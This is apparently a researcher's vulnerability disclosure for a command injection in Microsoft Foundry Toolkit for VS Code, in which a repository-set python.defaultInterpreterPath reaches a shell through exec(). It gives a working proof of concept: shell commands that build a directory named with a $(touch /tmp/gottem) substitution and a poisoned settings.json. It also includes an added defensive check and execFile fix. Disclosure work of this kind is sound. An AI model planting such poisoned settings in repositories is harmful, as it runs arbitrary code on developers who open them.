Microsoft Foundry Toolkit for VS Code: Command Injection via Python Interpreter Path Leading to Arbitrary Code Execution


Microsoft Foundry Toolkit for VS Code (formerly AI Toolkit for VS Code) uses child_process.exec() with string interpolation to build shell commands that include a Python interpreter path obtained from the Python extension API (ms-python.python via getExecutionDetails()).

The interpreter path can be controlled by a repository through .vscode/settings.json (python.defaultInterpreterPath). On Linux/macOS, this can be abused for shell command injection because the extension wraps the path in double quotes and passes it to exec() (which invokes a shell). Command substitution such as $(…) is evaluated inside double quotes by POSIX shells.
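The following Node.js example is added here and is not code from the extension or from the original post. It flags a python.defaultInterpreterPath value containing characters that stay active inside double quotes on a POSIX shell, and launches the interpreter with execFile() so the path is never parsed by a shell; the function names, sample paths and marker file are assumptions made for illustration.

```javascript
// Added example, not the extension's code. All names here are hypothetical.
const { execFileSync } = require('child_process');
const fs = require('fs');
const os = require('os');
const path = require('path');

// Characters a POSIX shell still interprets inside double quotes.
const ACTIVE_IN_DQUOTES = /[$`"\\]/;

// Review check for an untrusted workspace: would this interpreter path change
// meaning if wrapped in double quotes and handed to a shell?
// Assumption: settings.json is strict JSON (VS Code also tolerates comments).
function auditWorkspaceSettings(settingsText) {
  const value = JSON.parse(settingsText)['python.defaultInterpreterPath'];
  if (typeof value !== 'string') return { set: false, suspicious: false };
  const suspicious = ACTIVE_IN_DQUOTES.test(value) || /[\r\n]/.test(value);
  return { set: true, suspicious, value };
}

// Hardened invocation: no shell is involved and the path is a single argv[0]
// string, so "$(...)" can only ever be a literal directory name.
function runInterpreter(interpreterPath, args) {
  return execFileSync(interpreterPath, args, { encoding: 'utf8', shell: false });
}

// Constructed samples; the first mirrors the shape of the PoC settings file.
const marker = path.join(os.tmpdir(), `aitk-marker-${process.pid}`);
const SAMPLE_POISONED = JSON.stringify({
  'python.defaultInterpreterPath': `/repo/$(touch ${marker})/python3`,
});
const SAMPLE_BENIGN = JSON.stringify({
  'python.defaultInterpreterPath': '/usr/bin/python3',
});

function demo() {
  const finding = auditWorkspaceSettings(SAMPLE_POISONED);
  let spawnError = null;
  try {
    runInterpreter(finding.value, ['--version']);
  } catch (err) {
    spawnError = err.code; // the literal path does not exist on disk
  }
  return {
    poisonedFlagged: finding.suspicious,
    benignFlagged: auditWorkspaceSettings(SAMPLE_BENIGN).suspicious,
    spawnError,
    markerCreated: fs.existsSync(marker), // nothing evaluated the substitution
  };
}
console.log(demo());
```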

 

Proof of Concept 

I validated arbitrary command execution on AI Toolkit version 0.31.2026021209 by pointing python.defaultInterpreterPath to a real Python interpreter located under a directory whose literal name contains $(touch /tmp/gottem).

Create the PoC repository and files:

mkdir -p malicious-project/.aitk malicious-project/.vscode
echo '{}' > malicious-project/.aitk/config.json
mkdir -p 'malicious-project/$(touch /tmp/gottem)'
ln -sf /usr/bin/python3 'malicious-project/$(touch /tmp/gottem)/python3'

Set the poisoned interpreter path using the absolute repository path:

REPO_PATH="$(cd malicious-project && pwd)"
# Note: \$ escapes the dollar sign so the literal string $(touch …)
# ends up in the JSON, while ${REPO_PATH} expands to the real path.
cat > malicious-project/.vscode/settings.json << JSONEOF
{
  "python.defaultInterpreterPath": "${REPO_PATH}/\$(touch /tmp/gottem)/python3"
}
JSONEOF

Open the repository in VS Code with the AI Toolkit and Python extensions installed:

code malicious-project/

In VS Code, click the AI Toolkit Testing view in the sidebar (the potion icon).

In the AI Toolkit Testing panel, click Run Evaluation in Foundry (this reaches pytest --collect-evals). No other files need to be opened first; the Python extension resolves the interpreter path from workspace settings when AI Toolkit requests it.

Verify execution:

ls -la /tmp/gottem

 

Ben Smith